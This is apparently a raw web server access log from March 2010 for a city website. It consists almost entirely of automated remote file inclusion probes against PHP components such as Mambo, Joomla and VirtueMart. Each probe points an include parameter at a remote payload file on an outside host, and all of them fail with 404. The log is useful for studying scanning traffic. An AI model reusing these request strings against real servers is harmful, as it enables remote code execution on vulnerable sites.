217.73.168.38 - - [01/Mar/2010:09:18:47 -0800] "GET /logs/access_091031.log//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:09:19:07 -0800] "GET /logs/access.log//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:09:19:07 -0800] "GET /logs//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:09:19:07 -0800] "GET /write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:09:19:24 -0800] "GET /logs/access_090301.log//admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:09:19:24 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:09:19:24 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:09:23:28 -0800] "GET /logs/access_090301.log//admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:09:23:29 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:09:23:29 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
217.73.168.38 - - [01/Mar/2010:09:24:07 -0800] "GET /logs/access_091231.log//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:09:24:34 -0800] "GET /logs/access_090901.log//admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:09:24:52 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:09:24:52 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:09:25:03 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:09:25:05 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:09:25:05 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:09:25:05 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:09:25:33 -0800] "GET /logs/access_090301.log//admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:09:25:34 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:09:25:39 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
217.73.168.38 - - [01/Mar/2010:09:27:12 -0800] "GET /errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
217.73.168.38 - - [01/Mar/2010:09:27:12 -0800] "GET /logs//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:09:27:37 -0800] "GET /logs/access_090901.log//admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:09:37:16 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:09:37:18 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:09:37:22 -0800] "GET /logs/access_081230.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:09:37:37 -0800] "GET /logs/access_090201.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:09:38:35 -0800] "GET /logs/access_090301.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:09:38:35 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:09:38:35 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:09:38:42 -0800] "GET /logs/access_090901.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
92.241.164.109 - - [01/Mar/2010:09:40:50 -0800] "GET / HTTP/1.0" 200 901 "http://cityofarkadelphia.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:09:42:01 -0800] "GET /addevent.inc.php?agendax_path=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:09:42:01 -0800] "GET /logs//addevent.inc.php?agendax_path=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
62.140.23.24 - - [01/Mar/2010:09:43:27 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.140.23.24 - - [01/Mar/2010:09:43:27 -0800] "GET /logs/access_081230.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.140.23.24 - - [01/Mar/2010:09:43:27 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.140.23.24 - - [01/Mar/2010:09:43:51 -0800] "GET /logs/access_090201.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.67.235.148 - - [01/Mar/2010:09:44:27 -0800] "GET /logs/access_090501.log%22%20%20target=%22_blank//addevent.inc.php?agendax_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "cityofarkadelphia.com"
62.67.235.148 - - [01/Mar/2010:09:44:27 -0800] "GET /addevent.inc.php?agendax_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "cityofarkadelphia.com"
62.67.235.148 - - [01/Mar/2010:09:44:27 -0800] "GET /logs//addevent.inc.php?agendax_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "cityofarkadelphia.com"
80.67.28.152 - - [01/Mar/2010:09:44:27 -0800] "GET /main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.67.28.152 - - [01/Mar/2010:09:44:27 -0800] "GET /logs//main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.67.28.152 - - [01/Mar/2010:09:44:33 -0800] "GET /logs//main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:09:44:34 -0800] "GET /main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:09:44:34 -0800] "GET /logs//main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.67.28.152 - - [01/Mar/2010:09:44:36 -0800] "GET /logs/access_090601.log//main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.67.28.152 - - [01/Mar/2010:09:44:38 -0800] "GET /logs/access_090601.log//main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:09:44:41 -0800] "GET /logs/access_090601.log//main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:09:44:43 -0800] "GET /logs/access_090601.log//main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:09:44:43 -0800] "GET /logs//main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:09:44:43 -0800] "GET /main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.67.235.148 - - [01/Mar/2010:09:45:05 -0800] "GET /logs/access_091101.log%22%20%20target=%22_blank//addevent.inc.php?agendax_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:09:45:41 -0800] "GET /main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:09:45:41 -0800] "GET /logs/access_090601.log//main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:09:45:41 -0800] "GET /logs//main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.67.28.152 - - [01/Mar/2010:09:45:58 -0800] "GET /logs/access_090801.log//main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:09:46:00 -0800] "GET /write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:09:46:00 -0800] "GET /logs//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:09:46:00 -0800] "GET /logs/access.log//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:09:46:11 -0800] "GET /logs/access_090801.log//main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.67.28.152 - - [01/Mar/2010:09:46:17 -0800] "GET /logs/access_090801.log//main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:09:46:43 -0800] "GET /logs/access_090801.log//main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:09:47:20 -0800] "GET /logs/access_090801.log//main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:09:47:40 -0800] "GET /main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:09:47:40 -0800] "GET /logs//main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:09:47:43 -0800] "GET /logs/access_090601.log//main.php?config[search_disp]=true&include_dir=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
68.109.233.150 - - [01/Mar/2010:09:50:18 -0800] "GET /snippets/reflect/snippet.reflect.php?reflect_base=http://www.babywaves.com//av/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
68.109.233.150 - - [01/Mar/2010:09:50:19 -0800] "GET /logs/access_091001.log//snippets/reflect/snippet.reflect.php?reflect_base=http://www.babywaves.com//av/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
68.109.233.150 - - [01/Mar/2010:09:50:21 -0800] "GET /logs/access_091101.log//snippets/reflect/snippet.reflect.php?reflect_base=http://www.babywaves.com//av/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
68.109.233.150 - - [01/Mar/2010:09:50:25 -0800] "GET /snippets/reflect/snippet.reflect.php?reflect_base=http://www.babywaves.com//av/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
68.109.233.150 - - [01/Mar/2010:09:50:28 -0800] "GET /logs/access_091101.log//snippets/reflect/snippet.reflect.php?reflect_base=http://www.babywaves.com//av/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
68.109.233.150 - - [01/Mar/2010:09:50:28 -0800] "GET /logs/access_091001.log//snippets/reflect/snippet.reflect.php?reflect_base=http://www.babywaves.com//av/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.80.108.81 - - [01/Mar/2010:09:53:37 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.80.108.81 - - [01/Mar/2010:09:53:37 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.80.108.81 - - [01/Mar/2010:09:53:38 -0800] "GET /logs/access_090701.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.67.235.148 - - [01/Mar/2010:09:54:16 -0800] "GET /logs/access_090501.log//addevent.inc.php?agendax_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "cityofarkadelphia.com"
220.80.108.81 - - [01/Mar/2010:09:54:20 -0800] "GET /logs/access_090201.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:09:54:22 -0800] "GET /logs/access_090501.log//addevent.inc.php?agendax_path=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
80.245.60.130 - - [01/Mar/2010:09:55:15 -0800] "GET /logs/access.log//addevent.inc.php?agendax_path=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:09:55:58 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:09:55:58 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:09:55:58 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:09:56:11 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:09:56:11 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:09:56:11 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.67.235.148 - - [01/Mar/2010:09:56:12 -0800] "GET /logs/access.log//addevent.inc.php?agendax_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:09:56:15 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:09:56:20 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:09:56:25 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:09:58:22 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:09:58:23 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:09:58:23 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:09:58:27 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:09:58:27 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:09:58:28 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:09:58:54 -0800] "GET /logs/access_100101.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:09:58:54 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:09:58:54 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.73.168.38 - - [01/Mar/2010:09:59:25 -0800] "GET /logs/access_090101.log//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:10:00:56 -0800] "GET /logs/access_090601.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:10:01:07 -0800] "GET /logs/access_090601.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:01:25 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:01:25 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:01:26 -0800] "GET /logs/access_100101.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:01:48 -0800] "GET /logs/access_090201.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:02:20 -0800] "GET /logs/access_090201.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:10:02:29 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:10:02:30 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
217.73.168.38 - - [01/Mar/2010:10:02:59 -0800] "GET /logs/access_090401.log//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
217.73.168.38 - - [01/Mar/2010:10:03:21 -0800] "GET /logs/access_100201.log//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
121.101.214.54 - - [01/Mar/2010:10:05:19 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
121.101.214.54 - - [01/Mar/2010:10:05:19 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
121.101.214.54 - - [01/Mar/2010:10:05:19 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
121.101.214.54 - - [01/Mar/2010:10:07:25 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
